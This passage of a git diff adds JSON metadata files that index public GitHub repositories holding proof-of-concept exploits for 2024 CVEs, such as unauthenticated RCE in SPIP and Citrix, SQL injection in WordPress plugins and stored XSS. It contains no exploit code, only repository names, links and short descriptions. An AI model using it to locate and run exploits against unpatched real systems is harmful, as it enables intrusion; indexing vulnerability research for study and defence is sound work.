"https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/CVE-2024-7646", + "description": "PoC CVE-2024-7646", + "fork": false, + "created_at": "2024-08-29T19:10:08Z", + "updated_at": "2024-08-29T19:10:33Z", + "pushed_at": "2024-08-29T19:10:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 862891732, + "name": "cve-2024-7646", + "full_name": "dovics\/cve-2024-7646", + "owner": { + "login": "dovics", + "id": 45029442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45029442?v=4", + "html_url": "https:\/\/github.com\/dovics", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovics\/cve-2024-7646", + "description": "PoC CVE-2024-7646", + "fork": false, + "created_at": "2024-09-25T11:13:07Z", + "updated_at": "2024-09-25T11:15:30Z", + "pushed_at": "2024-09-25T11:13:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7703.json b/2024/CVE-2024-7703.json new file mode 100644 index 0000000000..a7f839df75 --- /dev/null +++ b/2024/CVE-2024-7703.json @@ -0,0 +1,33 @@ +[ + { + "id": 843828348, + "name": "CVE-2024-7703", + "full_name": "lfillaz\/CVE-2024-7703", + "owner": { + "login": "lfillaz", + "id": 114345508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114345508?v=4", + "html_url": "https:\/\/github.com\/lfillaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfillaz\/CVE-2024-7703", + "description": "This repository contains an exploit for CVE-2024-7703 in the ARMember WordPress plugin. It allows attackers with Subscriber-level access or higher to upload SVG files with malicious JavaScript, leading to Stored XSS attacks. This can result in executing scripts when the file is accessed, potentially compromising user sessions or data.", + "fork": false, + "created_at": "2024-08-17T14:44:08Z", + "updated_at": "2024-08-22T02:30:08Z", + "pushed_at": "2024-08-17T14:51:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7808.json b/2024/CVE-2024-7808.json new file mode 100644 index 0000000000..c1ef9537f8 --- /dev/null +++ b/2024/CVE-2024-7808.json @@ -0,0 +1,38 @@ +[ + { + "id": 884904353, + "name": "CVE-2024-7808", + "full_name": "TheUnknownSoul\/CVE-2024-7808", + "owner": { + "login": "TheUnknownSoul", + "id": 58050201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4", + "html_url": "https:\/\/github.com\/TheUnknownSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2024-7808", + "description": "RCE exploit for low privileged user via CSRF in open-webui ", + "fork": false, + "created_at": "2024-11-07T15:42:53Z", + "updated_at": "2024-11-20T16:31:09Z", + "pushed_at": "2024-11-08T10:08:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "csrf", + "hack-tool", + "open-webui", + "rce-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7854.json b/2024/CVE-2024-7854.json new file mode 100644 index 0000000000..77b420df5c --- /dev/null +++ b/2024/CVE-2024-7854.json @@ -0,0 +1,33 @@ +[ + { + "id": 867703844, + "name": "CVE-2024-7854", + "full_name": "RandomRobbieBF\/CVE-2024-7854", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-7854", + "description": "Woo Inquiry <= 0.1 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-10-04T14:59:36Z", + "updated_at": "2024-10-18T17:57:30Z", + "pushed_at": "2024-10-04T15:03:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7856.json b/2024/CVE-2024-7856.json new file mode 100644 index 0000000000..84a8257430 --- /dev/null +++ b/2024/CVE-2024-7856.json @@ -0,0 +1,33 @@ +[ + { + "id": 854473845, + "name": "CVE-2024-7856", + "full_name": "l8BL\/CVE-2024-7856", + "owner": { + "login": "l8BL", + "id": 151047781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151047781?v=4", + "html_url": "https:\/\/github.com\/l8BL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l8BL\/CVE-2024-7856", + "description": "Proof-of-Concept for CVE-2024-7856", + "fork": false, + "created_at": "2024-09-09T08:34:09Z", + "updated_at": "2024-09-10T07:28:54Z", + "pushed_at": "2024-09-09T08:39:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7928.json b/2024/CVE-2024-7928.json new file mode 100644 index 0000000000..c09f528c64 --- /dev/null +++ b/2024/CVE-2024-7928.json @@ -0,0 +1,126 @@ +[ + { + "id": 844819282, + "name": "CVE-2024-7928", + "full_name": "bigb0x\/CVE-2024-7928", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-7928", + "description": "Will attempt to retrieve DB details for FastAdmin instances", + "fork": false, + "created_at": "2024-08-20T03:09:47Z", + "updated_at": "2024-11-20T16:31:01Z", + "pushed_at": "2024-08-20T03:21:56Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 845013815, + "name": "CVE-2024-7928", + "full_name": "gh-ost00\/CVE-2024-7928", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-7928", + "description": "CVE-2024-7928 fastadmin vulnerability POC & Scanning", + "fork": false, + "created_at": "2024-08-20T12:15:48Z", + "updated_at": "2024-09-23T12:28:22Z", + "pushed_at": "2024-08-20T12:26:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846105212, + "name": "CVE-2024-7928", + "full_name": "wh6amiGit\/CVE-2024-7928", + "owner": { + "login": "wh6amiGit", + "id": 121056021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121056021?v=4", + "html_url": "https:\/\/github.com\/wh6amiGit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wh6amiGit\/CVE-2024-7928", + "description": "CVE-2024-7928 FastAdmin < V1.3.4.20220530 exploit", + "fork": false, + "created_at": "2024-08-22T14:39:13Z", + "updated_at": "2024-08-23T15:32:23Z", + "pushed_at": "2024-08-23T15:32:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846625199, + "name": "CVE-2024-7928", + "full_name": "th3gokul\/CVE-2024-7928", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-7928", + "description": "CVE-2024-7928: FastAdmin < V1.3.4.20220530 Arbitrary File Reading Vulnerability", + "fork": false, + "created_at": "2024-08-23T15:50:30Z", + "updated_at": "2024-09-28T20:39:18Z", + "pushed_at": "2024-08-23T16:59:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7954.json b/2024/CVE-2024-7954.json new file mode 100644 index 0000000000..1f609b42fe --- /dev/null +++ b/2024/CVE-2024-7954.json @@ -0,0 +1,188 @@ +[ + { + "id": 840829976, + "name": "CVE-2024-7954", + "full_name": "Chocapikk\/CVE-2024-7954", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-7954", + "description": "Unauthenticated Remote Code Execution in SPIP versions up to and including 4.2.12", + "fork": false, + "created_at": "2024-08-10T20:15:41Z", + "updated_at": "2024-10-29T09:54:56Z", + "pushed_at": "2024-08-12T13:46:06Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 848869603, + "name": "CVE-2024-7954", + "full_name": "bigb0x\/CVE-2024-7954", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-7954", + "description": "This exploit will attempt to execute system commands on SPIP targets.", + "fork": false, + "created_at": "2024-08-28T14:54:56Z", + "updated_at": "2024-09-18T22:48:10Z", + "pushed_at": "2024-08-28T18:26:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850636095, + "name": "CVE-2024-7954-RCE", + "full_name": "gh-ost00\/CVE-2024-7954-RCE", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-7954-RCE", + "description": "Unauthenticated Remote Code Execution in SPIP versions up to and including 4.2.12 ", + "fork": false, + "created_at": "2024-09-01T10:59:45Z", + "updated_at": "2024-10-15T14:33:18Z", + "pushed_at": "2024-09-01T11:07:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 861854729, + "name": "RCE_CVE-2024-7954", + "full_name": "TheCyberguy-17\/RCE_CVE-2024-7954", + "owner": { + "login": "TheCyberguy-17", + "id": 182538709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182538709?v=4", + "html_url": "https:\/\/github.com\/TheCyberguy-17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberguy-17\/RCE_CVE-2024-7954", + "description": null, + "fork": false, + "created_at": "2024-09-23T16:11:20Z", + "updated_at": "2024-10-16T03:51:59Z", + "pushed_at": "2024-09-23T16:27:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867991834, + "name": "RCE-CVE-2024-7954", + "full_name": "MuhammadWaseem29\/RCE-CVE-2024-7954", + "owner": { + "login": "MuhammadWaseem29", + "id": 161931698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161931698?v=4", + "html_url": "https:\/\/github.com\/MuhammadWaseem29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuhammadWaseem29\/RCE-CVE-2024-7954", + "description": null, + "fork": false, + "created_at": "2024-10-05T07:24:57Z", + "updated_at": "2024-10-16T17:20:37Z", + "pushed_at": "2024-10-05T07:55:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889221961, + "name": "CVE-2024-7954", + "full_name": "issamjr\/CVE-2024-7954", + "owner": { + "login": "issamjr", + "id": 101994309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101994309?v=4", + "html_url": "https:\/\/github.com\/issamjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/issamjr\/CVE-2024-7954", + "description": "The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.", + "fork": false, + "created_at": "2024-11-15T21:08:47Z", + "updated_at": "2024-11-15T22:51:47Z", + "pushed_at": "2024-11-15T21:10:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-7965.json b/2024/CVE-2024-7965.json new file mode 100644 index 0000000000..52e1e77843 --- /dev/null +++ b/2024/CVE-2024-7965.json @@ -0,0 +1,69 @@ +[ + { + "id": 858363141, + "name": "CVE-2024-7965", + "full_name": "bi-zone\/CVE-2024-7965", + "owner": { + "login": "bi-zone", + "id": 30549217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30549217?v=4", + "html_url": "https:\/\/github.com\/bi-zone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bi-zone\/CVE-2024-7965", + "description": "This repository contains PoC for CVE-2024-7965. This is the vulnerability in the V8 that occurs only within ARM64.", + "fork": false, + "created_at": "2024-09-16T19:04:57Z", + "updated_at": "2024-11-20T16:31:04Z", + "pushed_at": "2024-09-16T19:44:54Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 45, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 892392509, + "name": "cve-2024-7965-poc", + "full_name": "XiaomingX\/cve-2024-7965-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-7965-poc", + "description": "CVE-2024-7965是Google Chrome浏览器中V8 JavaScript引擎的一个高危漏洞。该漏洞源于V8引擎在处理特定JavaScript代码时实现不当,导致堆内存损坏。攻击者可通过诱导用户访问包含特制JavaScript的恶意网页,利用此漏洞在Chrome渲染器中执行任意代码。", + "fork": false, + "created_at": "2024-11-22T02:55:33Z", + "updated_at": "2024-11-22T03:42:13Z", + "pushed_at": "2024-11-22T02:58:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-7965", + "exp", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8069.json b/2024/CVE-2024-8069.json new file mode 100644 index 0000000000..4d6912051b --- /dev/null +++ b/2024/CVE-2024-8069.json @@ -0,0 +1,39 @@ +[ + { + "id": 887638974, + "name": "cve-2024-8069-exp-Citrix-Virtual-Apps-XEN", + "full_name": "XiaomingX\/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN", + "description": "Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE", + "fork": false, + "created_at": "2024-11-13T02:50:56Z", + "updated_at": "2024-11-22T09:52:50Z", + "pushed_at": "2024-11-13T03:29:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8190.json b/2024/CVE-2024-8190.json new file mode 100644 index 0000000000..de8d79e214 --- /dev/null +++ b/2024/CVE-2024-8190.json @@ -0,0 +1,33 @@ +[ + { + "id": 858260109, + "name": "CVE-2024-8190", + "full_name": "horizon3ai\/CVE-2024-8190", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-8190", + "description": "CVE-2024-8190: Ivanti Cloud Service Appliance Command Injection", + "fork": false, + "created_at": "2024-09-16T15:33:46Z", + "updated_at": "2024-11-26T23:19:35Z", + "pushed_at": "2024-09-16T15:43:44Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8275.json b/2024/CVE-2024-8275.json new file mode 100644 index 0000000000..213a628cfe --- /dev/null +++ b/2024/CVE-2024-8275.json @@ -0,0 +1,64 @@ +[ + { + "id": 863368849, + "name": "CVE-2024-8275", + "full_name": "p33d\/CVE-2024-8275", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-8275", + "description": null, + "fork": false, + "created_at": "2024-09-26T07:16:21Z", + "updated_at": "2024-09-26T11:10:23Z", + "pushed_at": "2024-09-26T11:10:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886590910, + "name": "CVE-2024-8275", + "full_name": "whiterose7777\/CVE-2024-8275", + "owner": { + "login": "whiterose7777", + "id": 174041119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174041119?v=4", + "html_url": "https:\/\/github.com\/whiterose7777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whiterose7777\/CVE-2024-8275", + "description": null, + "fork": false, + "created_at": "2024-11-11T08:53:27Z", + "updated_at": "2024-11-12T08:52:35Z", + "pushed_at": "2024-11-11T08:56:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8277.json b/2024/CVE-2024-8277.json new file mode 100644 index 0000000000..12b5d97c26 --- /dev/null +++ b/2024/CVE-2024-8277.json @@ -0,0 +1,33 @@ +[ + { + "id": 856416225, + "name": "CVE-2024-8277", + "full_name": "PolatBey\/CVE-2024-8277", + "owner": { + "login": "PolatBey", + "id": 25030792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25030792?v=4", + "html_url": "https:\/\/github.com\/PolatBey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PolatBey\/CVE-2024-8277", + "description": "CVE-2024-8277 - 0Day Auto Exploit Authentication Bypass in WooCommerce Photo Reviews Plugin", + "fork": false, + "created_at": "2024-09-12T14:40:59Z", + "updated_at": "2024-09-12T14:40:59Z", + "pushed_at": "2024-09-12T14:41:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8309.json b/2024/CVE-2024-8309.json new file mode 100644 index 0000000000..9ad7533c84 --- /dev/null +++ b/2024/CVE-2024-8309.json @@ -0,0 +1,33 @@ +[ + { + "id": 864608875, + "name": "CVE-2024-8309", + "full_name": "liadlevy\/CVE-2024-8309", + "owner": { + "login": "liadlevy", + "id": 59486223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59486223?v=4", + "html_url": "https:\/\/github.com\/liadlevy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liadlevy\/CVE-2024-8309", + "description": "A PoC for CVE-2024–8309", + "fork": false, + "created_at": "2024-09-28T17:11:52Z", + "updated_at": "2024-11-28T08:05:10Z", + "pushed_at": "2024-10-05T20:40:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8349.json b/2024/CVE-2024-8349.json new file mode 100644 index 0000000000..f1badcd066 --- /dev/null +++ b/2024/CVE-2024-8349.json @@ -0,0 +1,33 @@ +[ + { + "id": 858761331, + "name": "CVE-2024-8349-and-CVE-2024-8350", + "full_name": "karlemilnikka\/CVE-2024-8349-and-CVE-2024-8350", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-8349-and-CVE-2024-8350", + "description": "Authenticated Privilege Escalation to Admin exploiting Uncanny Groups for LearnDash.", + "fork": false, + "created_at": "2024-09-17T13:44:04Z", + "updated_at": "2024-09-24T14:34:21Z", + "pushed_at": "2024-09-24T14:34:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8353.json b/2024/CVE-2024-8353.json new file mode 100644 index 0000000000..b7cdd6158d --- /dev/null +++ b/2024/CVE-2024-8353.json @@ -0,0 +1,41 @@ +[ + { + "id": 865536429, + "name": "CVE-2024-8353", + "full_name": "EQSTLab\/CVE-2024-8353", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-8353", + "description": "Proof-of-Concept for CVE-2024-8353", + "fork": false, + "created_at": "2024-09-30T17:33:59Z", + "updated_at": "2024-10-29T13:40:41Z", + "pushed_at": "2024-10-01T00:04:52Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "php", + "poc", + "proof-of-concept", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8484.json b/2024/CVE-2024-8484.json new file mode 100644 index 0000000000..4031b3199f --- /dev/null +++ b/2024/CVE-2024-8484.json @@ -0,0 +1,33 @@ +[ + { + "id": 862372924, + "name": "CVE-2024-8484", + "full_name": "RandomRobbieBF\/CVE-2024-8484", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-8484", + "description": "REST API TO MiniProgram <= 4.7.1 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-09-24T13:46:02Z", + "updated_at": "2024-10-18T17:57:35Z", + "pushed_at": "2024-09-24T13:49:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8504.json b/2024/CVE-2024-8504.json new file mode 100644 index 0000000000..0f24989e63 --- /dev/null +++ b/2024/CVE-2024-8504.json @@ -0,0 +1,64 @@ +[ + { + "id": 857247047, + "name": "CVE-2024-8504", + "full_name": "Chocapikk\/CVE-2024-8504", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-8504", + "description": "VICIdial Unauthenticated SQLi to RCE Exploit (CVE-2024-8503 and CVE-2024-8504)", + "fork": false, + "created_at": "2024-09-14T06:27:11Z", + "updated_at": "2024-11-20T18:02:22Z", + "pushed_at": "2024-09-15T21:34:35Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 861411441, + "name": "ViciDial", + "full_name": "havokzero\/ViciDial", + "owner": { + "login": "havokzero", + "id": 46027877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46027877?v=4", + "html_url": "https:\/\/github.com\/havokzero", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/havokzero\/ViciDial", + "description": "CVE-2024-8504", + "fork": false, + "created_at": "2024-09-22T20:17:10Z", + "updated_at": "2024-10-02T04:39:27Z", + "pushed_at": "2024-10-04T00:43:08Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-8517.json b/2024/CVE-2024-8517.json new file mode 100644 index 0000000000..b31082950b --- /dev/null +++ b/2024/CVE-2024-8517.json @@ -0,0 +1,33 @@ +[ + { + "id": 853472932, + "name": "CVE-2024-8517", + "full_name": "Chocapikk\/CVE-2024-8517", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-8517", + "description": "SPIP 